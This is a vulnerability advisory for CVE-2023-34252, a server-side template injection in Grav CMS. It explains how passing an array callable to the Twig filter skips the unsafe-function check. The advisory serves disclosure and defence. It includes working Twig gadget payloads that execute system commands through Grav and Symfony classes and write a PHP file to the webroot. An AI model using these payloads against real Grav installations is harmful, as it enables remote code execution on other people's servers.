logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2023-34252 getgrav/grav

Package

Manager: composer
Name: getgrav/grav
Vulnerable Version: >=0 <1.7.42

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00321 pctl0.54483

Details

Grav Server-side Template Injection (SSTI) via Twig Default Filters Hi, actually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Insufficient Validation in filterFilter ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0007 | | **CVE Identifier** | TBD | | **CWE(s)** | CWE-20: Improper Input Validation, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine | ## CVSS3.1 Scoring System: **Base Score:** 7.2 (High) **Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` | **Metric** | **Value** | | ---------------------------- | --------- | | **Attack Vector (AV)** | Network | | **Attack Complexity (AC)** | Low | | **Privileges Required (PR)** | High | | **User Interaction (UI)** | None | | **Scope (S)** | Unchanged | | **Confidentiality \(C)** | High | | **Integrity (I)** | High | | **Availability (A)** | High | ## Product Overview: Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin. ## Vulnerability Summary: There is a logic flaw in the `GravExtension.filterFilter()` function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. ## Vulnerability Details: The vulnerability can be found in the `GravExtension.filterFilter()` function declared in [`/system/src/Grav/Common/Twig/Extension/GravExtension.php`](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698): ~~~php ... class GravExtension extends AbstractExtension implements GlobalsInterface { ... /** * Return a list of all filters. * * @return array */ public function getFilters(): array { return [ ... // Security fix new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]), ]; } ... /** * @param Environment $env * @param array $array * @param callable|string $arrow * @return array|CallbackFilterIterator * @throws RuntimeError */ function filterFilter(Environment $env, $array, $arrow) { if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { // [1] throw new RuntimeError('Twig |filter("' . $arrow . '") is not allowed.'); } return \twig_array_filter($env, $array, $arrow); // [2] } } ~~~ At [1], the `$arrow` parameter contains the argument supplied to the filter. For example, it may refer to `"funcname"` in `{{ array|filter("funcname") }}` or the closure (a.k.a. arrow function) `el => el != 'exclude'` in `{{ array|filter(el => el != 'exclude') }}`. Observe that `Utils::isDangerousFunction($arrow)` is only invoked if `$arrow` is a string. As such, non-string arguments may be passed to `twig_array_filter()` at [2] due to the absence of type enforcement at [1]. The implementation of the `twig_array_filter()` function can be found in [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) within Twig's codebase: ~~~php function twig_array_filter(Environment $env, $array, $arrow) { if (!twig_test_iterable($array)) { throw new RuntimeError(sprintf('The "filter" filter expects an array or "Traversable", got "%s".', \is_object($array) ? \get_class($array) : \gettype($array))); } if (!$arrow instanceof Closure && $env->hasExtension('\Twig\Extension\SandboxExtension') && $env->getExtension('\Twig\Extension\SandboxExtension')->isSandboxed()) { // [3] throw new RuntimeError('The callable passed to "filter" filter must be a Closure in sandbox mode.'); } if (\is_array($array)) { if (\PHP_VERSION_ID >= 50600) { return array_filter($array, $arrow, \ARRAY_FILTER_USE_BOTH); // [4] } return array_filter($array, $arrow); } // the IteratorIterator wrapping is needed as some internal PHP classes are \Traversable but do not implement \Iterator return new \CallbackFilterIterator(new \IteratorIterator($array), $arrow); } ~~~ At [3], a runtime error is thrown if `$arrow` is not a closure and Twig sandbox is enabled. However, since Grav does not use the Twig Sandbox extension, the check passes successfully even when `$arrow` is not a closure. Subsequently at [4], `array_filter()` is invoked with the user-controlled `$array` input and `$arrow` parameter. Note that the method signature of `array_filter()` is as follows: ~~~php array_filter(array $array, ?callable $callback = null, int $mode = 0): array ~~~ A common mistake that developers make is assuming that the `callable` type refers to a `string` type. This is untrue, and it is [well documented in the PHP Manual](https://www.php.net/manual/en/language.types.callable.php): > A method of an instantiated object is passed as an **array containing an object at index 0 and the method name at index 1**. Accessing protected and private methods from within a class is allowed. > Static class methods can also be passed without instantiating an object of that class by either, **passing the class name instead of an object at index 0, or passing `ClassName::methodName`**. This means that all of the following method calls are valid: ~~~php // Type 1: Simple callback -- invokes system("id") array_filter(array("id"), "system"); // Type 2: Static class method call -- invokes Class::staticMethod($arg) array_filter(array($arg), array("Class", "staticMethod")); array_filter(array($arg), array("Class::staticMethod")); // same as above // Type 3: Object method call -- invokes $obj->method($arg) array_filter(array($arg), array($obj, "method")); ~~~ Going back to [1], if `$arrow` is an `array` instead of a `string` or `closure`, the validation check to prevent invocation of unsafe functions is completely skipped. Multiple static class methods within Grav's codebase and its dependencies were found to be suitable gadgets for achieving for remote code execution: ~~~twig // Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system("id"): {% set id = {'id': 0} %} {{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }} // Gadget 2: Using \Symfony\Component\VarDumper\Vardumper::setHandler() and \Symfony\Component\VarDumper\Vardumper::dump() to invoke system("id"): {{ ['system'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'setHandler'])}} {{ ['id'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'dump']) }} // Gadget 3: Using \RocketTheme\Toolbox\File\File::instance() in Grav's default theme to perform arbitrary file write to rce.php in the webroot: {{ (['rce.php'] | map(['\\RocketTheme\\Toolbox\\File\\File', 'instance']))[0].save('<?php echo phpinfo(); ') }} // Gadget 4: Using \Symfony\Component\Process\Process::fromShellCommandline() to invoke system("id"): {{ {'/':'sleep 3'} | map(['\\Symfony\\Component\\Process\\Process', 'fromShellCommandline']) | map(e => e.run()) | print_r }}

Metadata

Created: 2023-06-16T19:36:39Z
Modified: 2023-06-16T19:36:39Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-96xv-rmwj-6p9w/GHSA-96xv-rmwj-6p9w.json
CWE IDs: ["CWE-1336", "CWE-94"]
Alternative ID: GHSA-96xv-rmwj-6p9w
Finding: F422
Auto approve: 1